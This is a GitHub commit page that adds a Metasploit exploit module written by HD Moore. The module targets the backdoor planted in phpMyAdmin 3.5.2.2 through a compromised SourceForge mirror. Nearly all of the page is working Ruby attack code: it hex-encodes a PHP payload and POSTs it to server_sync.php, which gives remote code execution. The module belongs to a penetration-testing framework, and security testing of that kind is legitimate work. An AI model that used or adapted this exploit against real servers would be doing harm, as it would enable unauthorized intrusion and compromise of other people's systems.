Skip to content
Permalink
Browse files

Add exploit for phpmyadmin backdoor

  • Loading branch information...
HD Moore
HD Moore committed Sep 25, 2012
1 parent 93dd96d commit 3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d
Showing with 82 additions and 0 deletions.
  1. +82 −0 modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
@@ -0,0 +1,82 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
'Description' => %q{
This module exploits an arbitrary code execution backdoor
placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144, # 256k
},
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Sep 25 2012',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0))

register_options([
OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
], self.class)
end

def exploit

uris = []

tpath = datastore['PATH']
if tpath[-1,1] == '/'
tpath = tpath.chop
end

pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")

res = send_request_raw( {
'global' => true,
'uri' => tpath + "/server_sync.php",
'method' => 'POST',
'data' => pdata,
'headers' => {
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => pdata.length,
}
}, 1.0)

handler
end
end

0 comments on commit 3ade5a0

Please sign in to comment.
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.